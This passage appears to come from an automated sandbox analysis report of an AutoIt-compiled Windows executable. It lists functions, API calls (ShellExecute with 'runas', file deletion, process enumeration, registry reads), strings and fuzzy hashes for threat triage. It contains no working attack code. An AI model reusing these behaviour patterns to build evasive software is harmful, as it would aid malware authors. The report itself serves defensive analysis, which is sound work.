                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BE6D10), ref: 00B80BE9
                                              • ShellExecuteW.SHELL32(00000000), ref: 00B80BF0
                                                • Part of subcall function 00B4514C: GetSysColorBrush.USER32(0000000F), ref: 00B45156
                                                • Part of subcall function 00B4514C: LoadCursorW.USER32(00000000,00007F00), ref: 00B45165
                                                • Part of subcall function 00B4514C: LoadIconW.USER32(00000063), ref: 00B4517C
                                                • Part of subcall function 00B4514C: LoadIconW.USER32(000000A4), ref: 00B4518E
                                                • Part of subcall function 00B4514C: LoadIconW.USER32(000000A2), ref: 00B451A0
                                                • Part of subcall function 00B4514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B451C6
                                                • Part of subcall function 00B4514C: RegisterClassExW.USER32(?), ref: 00B4521C
                                                • Part of subcall function 00B450DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B45109
                                                • Part of subcall function 00B450DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B4512A
                                                • Part of subcall function 00B450DB: ShowWindow.USER32(00000000), ref: 00B4513E
                                                • Part of subcall function 00B450DB: ShowWindow.USER32(00000000), ref: 00B45147
                                                • Part of subcall function 00B459D3: _memset.LIBCMT ref: 00B459F9
                                                • Part of subcall function 00B459D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B45A9E
                                              Strings
                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B80B28
                                              • AutoIt, xrefs: 00B80B23
                                              • runas, xrefs: 00B80BE4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                              • API String ID: 529118366-2030392706
                                              • Opcode ID: 01870bc43fffb6a9da36daf65e1176885435f3794f15eed6064d0cbc02478338
                                              • Instruction ID: cf9f2ad45eb9a5a82703ef9a6fe4ebe95d85d1fc16e2289e84ac4538adc09e72
                                              • Opcode Fuzzy Hash: 01870bc43fffb6a9da36daf65e1176885435f3794f15eed6064d0cbc02478338
                                              • Instruction Fuzzy Hash: 17510231E4464CABCB21BBB49C46EFD7BF8EB0A380B1440E5F551631A2CEB05649EB20
                                              Function 00B93CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                                • Part of subcall function 00B94FEC: GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00B93D96
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B93E3E
                                              • MoveFileW.KERNEL32(?,?), ref: 00B93E51
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B93E6E
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B93E90
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B93EAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 676972a46237240de3999147363c85fb07f14268b6c78aae27adf9ff4c2f2e93
                                              • Instruction ID: fb9ed6a3516d06f3420eb709699f0b9ec2f3f99fe0ab95fe922b467e5ec7fb54
                                              • Opcode Fuzzy Hash: 676972a46237240de3999147363c85fb07f14268b6c78aae27adf9ff4c2f2e93
                                              • Instruction Fuzzy Hash: 6A514831C0114DAACF15EBA4DA929EEB7F9AF14301F2045E9E442B7192EB316F49DB60
                                              Function 00B45D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 957 b45d13-b45d73 call b41207 GetVersionExW call b41821 962 b45e78-b45e7a 957->962 963 b45d79 957->963 964 b80fa9-b80fb5 962->964 965 b45d7c-b45d81 963->965 966 b80fb6-b80fba 964->966 967 b45d87 965->967 968 b45e7f-b45e80 965->968 970 b80fbc 966->970 971 b80fbd-b80fc9 966->971 969 b45d88-b45dbf call b41981 call b4133d 967->969 968->969 980 b81098-b8109b 969->980 981 b45dc5-b45dc6 969->981 970->971 971->966 972 b80fcb-b80fd0 971->972 972->965 974 b80fd6-b80fdd 972->974 974->964 976 b80fdf 974->976 979 b80fe4-b80fea 976->979 982 b45e00-b45e17 GetCurrentProcess IsWow64Process 979->982 983 b8109d 980->983 984 b810b4-b810b8 980->984 985 b80fef-b80ffa 981->985 986 b45dcc-b45dcf 981->986 991 b45e1c-b45e2d 982->991 992 b45e19 982->992 989 b810a0 983->989 993 b810ba-b810c3 984->993 994 b810a3-b810ac 984->994 987 b80ffc-b81002 985->987 988 b81017-b81019 985->988 986->982 990 b45dd1-b45def 986->990 995 b8100c-b81012 987->995 996 b81004-b81007 987->996 998 b8101b-b81027 988->998 999 b8103c-b8103f 988->999 989->994 990->982 997 b45df1-b45df7 990->997 1001 b45e2f-b45e3f call b455f0 991->1001 1002 b45e98-b45ea2 GetSystemInfo 991->1002 992->991 993->989 1000 b810c5-b810c8 993->1000 994->984 995->982 996->982 997->979 1003 b45dfd 997->1003 1004 b81029-b8102c 998->1004 1005 b81031-b81037 998->1005 1007 b81041-b81050 999->1007 1008 b81065-b81068 999->1008 1000->994 1014 b45e41-b45e4e call b455f0 1001->1014 1015 b45e8c-b45e96 GetSystemInfo 1001->1015 1006 b45e65-b45e75 1002->1006 1003->982 1004->982 1005->982 1011 b8105a-b81060 1007->1011 1012 b81052-b81055 1007->1012 1008->982 1010 b8106e-b81083 1008->1010 1016 b8108d-b81093 1010->1016 1017 b81085-b81088 1010->1017 1011->982 1012->982 1022 b45e85-b45e8a 1014->1022 1023 b45e50-b45e54 GetNativeSystemInfo 1014->1023 1019 b45e56-b45e5a 1015->1019 1016->982 1017->982 1019->1006 1021 b45e5c-b45e5f FreeLibrary 1019->1021 1021->1006 1022->1023 1023->1019
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00B45D40
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • GetCurrentProcess.KERNEL32(?,00BC0A18,00000000,00000000,?), ref: 00B45E07
                                              • IsWow64Process.KERNEL32(00000000), ref: 00B45E0E
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B45E54
                                              • FreeLibrary.KERNEL32(00000000), ref: 00B45E5F
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B45E90
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00B45E9C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: b81ec185e74baf7d9a6e07a16eac685f5faaf3b5e0c6233f34ec5aeb5d588fbe
                                              • Instruction ID: 4111374c3eaf747a229cc145537531cc4db34e3e291537539ed179cd2b62e928
                                              • Opcode Fuzzy Hash: b81ec185e74baf7d9a6e07a16eac685f5faaf3b5e0c6233f34ec5aeb5d588fbe
                                              • Instruction Fuzzy Hash: 2391B53158AFC4DEC731DB6884505AAFFE5EF39300B8849DED0C797A12D630A648D769
                                              Function 00B94005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1024 b94005-b9404c call b41207 * 3 call b50284 call b94fec 1035 b9405c-b9408d call b50119 FindFirstFileW 1024->1035 1036 b9404e-b94057 call b41900 1024->1036 1040 b940fc-b94103 FindClose 1035->1040 1041 b9408f-b94091 1035->1041 1036->1035 1042 b94107-b94129 call b41cb6 * 3 1040->1042 1041->1040 1043 b94093-b94098 1041->1043 1045 b9409a-b940d5 call b41c9c call b417e0 call b41900 DeleteFileW 1043->1045 1046 b940d7-b940e9 FindNextFileW 1043->1046 1045->1046 1059 b940f3-b940fa FindClose 1045->1059 1046->1041 1047 b940eb-b940f1 1046->1047 1047->1041 1059->1042
                                              APIs
                                                • Part of subcall function 00B50284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B42A58,?,00008000), ref: 00B502A4
                                                • Part of subcall function 00B94FEC: GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00B9407C
                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00B940CC
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B940DD
                                              • FindClose.KERNEL32(00000000), ref: 00B940F4
                                              • FindClose.KERNEL32(00000000), ref: 00B940FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: bfe935608a693ab3b6d05e3ebcad69d5caa5513c0648190c23f28edc41040b46
                                              • Instruction ID: 5b01da2fefef4e48cb4376530d6680af1e57debe7cdb1583877d221a7226b82d
                                              • Opcode Fuzzy Hash: bfe935608a693ab3b6d05e3ebcad69d5caa5513c0648190c23f28edc41040b46
                                              • Instruction Fuzzy Hash: 70319E31418385ABC600EF64C891DAFBBE8BE95304F444EADF5E183192DB219A4AD762
                                              Function 00B94148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00B9416D
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00B9417B
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00B9419B
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B94245
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3243318325-0
                                              • Opcode ID: ad3825cafc3bc52acf4c48cebce01000d0b4e929f4f0a05a1f5077a0a929ab9c
                                              • Instruction ID: bc2ff10808f173ba1bd074c8efd7408b2a03858df6d19885a35c8daf3af1cf0c
                                              • Opcode Fuzzy Hash: ad3825cafc3bc52acf4c48cebce01000d0b4e929f4f0a05a1f5077a0a929ab9c
                                              • Instruction Fuzzy Hash: CF31BF715083419FC704EF54D885EAFBBE8FF99300F04096DF581C21A1EB709A89CB52
                                              Function 00B3B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B43740: CharUpperBuffW.USER32(?,00BF71DC,00000000,?,00000000,00BF71DC,?,00B353A5,?,?,?,?), ref: 00B4375D
                                              • _memmove.LIBCMT ref: 00B3B68A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_memmove
                                              • String ID:
                                              • API String ID: 2819905725-0
                                              • Opcode ID: 1ede3852b11abb524b19751a82ad1514f07b654001edbbeff11896abe293d9de
                                              • Instruction ID: 9545db17398a98144b3c374c50df538e73f9111f8588dc1d40926ddd46027008
                                              • Opcode Fuzzy Hash: 1ede3852b11abb524b19751a82ad1514f07b654001edbbeff11896abe293d9de
                                              • Instruction Fuzzy Hash: 1FA267716087419FC720CF18C480B2AB7E1FF84704F2489ADE99A9B366DB71ED45CB92
                                              Function 00B9494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00B7FC86), ref: 00B9495A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00B9496B
                                              • FindClose.KERNEL32(00000000), ref: 00B9497B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: df65689413a1ca11c01ccbb3f22eab7f47e638e63b5ac0d6520244297f8d2770
                                              • Instruction ID: 487bb8f47682110f02d89acdaad6ad324a9459c3d40a5af91dc422d3b0dff574
                                              • Opcode Fuzzy Hash: df65689413a1ca11c01ccbb3f22eab7f47e638e63b5ac0d6520244297f8d2770
                                              • Instruction Fuzzy Hash: 22E0DF31820505EB86107B38EC4DCEAB7ACDE0A339F500765F835C21E0EB709D448696
                                              Function 00B394E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ce52bceb8e81bbfcc3218a7ba463181520f8fc198b613711675e438871ed16a
                                              • Instruction ID: 94442ce9c1659f5495d02c56eaab7bf75564156f9336ea0271eb3d77f4414466
                                              • Opcode Fuzzy Hash: 1ce52bceb8e81bbfcc3218a7ba463181520f8fc198b613711675e438871ed16a
                                              • Instruction Fuzzy Hash: 17229E74A04205DFDB24DF58C480BAEB7F0FF59310F2485A9E85AAB391D7B0AD85CB91
                                              Function 00B3BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 00B3BF57
                                                • Part of subcall function 00B352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B352E6
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00B736B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePeekSleepTimetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                              • API String ID: 1792118007-922114024
                                              • Opcode ID: b69d38436d706c4e0d6ac2f83b3d97f18b4dbd180ee5ef56f7edfdbba03b28d8
                                              • Instruction ID: 7c120d160c8de072f3d05339c213f91021853da39721c38385fc3b9183bdc4fd
                                              • Opcode Fuzzy Hash: b69d38436d706c4e0d6ac2f83b3d97f18b4dbd180ee5ef56f7edfdbba03b28d8
                                              • Instruction Fuzzy Hash: BFC2B170608341DFD724DF24C884BAABBE4FF84704F24899DF59A972A1DB71E944DB42
                                              Function 00B333E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B33444
                                              • RegisterClassExW.USER32(00000030), ref: 00B3346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00B3349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B334AC
                                              • LoadIconW.USER32(000000A9), ref: 00B334C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: b0700c4ad65a5fee2cc299e996ef776f3c7c304cefa8044e46cd890cb71a0f2b
                                              • Instruction ID: 79a11a5f6ec81532aa32f325921c58396c27d8fbe7998c2f6a5ffec8ed84731f
                                              • Opcode Fuzzy Hash: b0700c4ad65a5fee2cc299e996ef776f3c7c304cefa8044e46cd890cb71a0f2b
                                              • Instruction Fuzzy Hash: FC3116B1994309EFDB50DFA8DC89BD9BBF0FB08310F10415AE590A72A0DBB51591CF90
                                              Function 00B33411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B33444
                                              • RegisterClassExW.USER32(00000030), ref: 00B3346E
                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3347F
                                              • InitCommonControlsEx.COMCTL32(?), ref: 00B3349C
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B334AC
                                              • LoadIconW.USER32(000000A9), ref: 00B334C2
                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B334D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 2914291525-1005189915
                                              • Opcode ID: aef26436eb813be1016232a8b9ab1a9395d889139d137036e4735d9702fb3e1e
                                              • Instruction ID: 7886eab6f5c68a6e54cc842ec859db69d434a709894e81aae5106f6b9a4f9237
                                              • Opcode Fuzzy Hash: aef26436eb813be1016232a8b9ab1a9395d889139d137036e4735d9702fb3e1e
                                              • Instruction Fuzzy Hash: AD21E2B1954209EFDB00AFA9EC89BADBBF4FB08710F00415AF514A72A0DBB11540CF91
                                              Function 00B42FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B500CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B43094), ref: 00B500ED
                                                • Part of subcall function 00B508C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B4309F), ref: 00B508E3
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B430E2
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B801BA
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B801FB
                                              • RegCloseKey.ADVAPI32(?), ref: 00B80239
                                              • _wcscat.LIBCMT ref: 00B80292
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: af85b4b7de7188cbd2156d452912ffc338d7acd13a9db5c4841fb0b52181bdf3
                                              • Instruction ID: 0764cb55889a9ddb5726cab6506578b24435097fe24d7b2f229ecb33a393cb85
                                              • Opcode Fuzzy Hash: af85b4b7de7188cbd2156d452912ffc338d7acd13a9db5c4841fb0b52181bdf3
                                              • Instruction Fuzzy Hash: EB718E715153059EC704EF29EC81A6BBBE8FF89350F4009AEF545872B1EF70AA48DB52
                                              Function 00B4514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B45156
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00B45165
                                              • LoadIconW.USER32(00000063), ref: 00B4517C
                                              • LoadIconW.USER32(000000A4), ref: 00B4518E
                                              • LoadIconW.USER32(000000A2), ref: 00B451A0
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B451C6
                                              • RegisterClassExW.USER32(?), ref: 00B4521C
                                                • Part of subcall function 00B33411: GetSysColorBrush.USER32(0000000F), ref: 00B33444
                                                • Part of subcall function 00B33411: RegisterClassExW.USER32(00000030), ref: 00B3346E
                                                • Part of subcall function 00B33411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3347F
                                                • Part of subcall function 00B33411: InitCommonControlsEx.COMCTL32(?), ref: 00B3349C
                                                • Part of subcall function 00B33411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B334AC
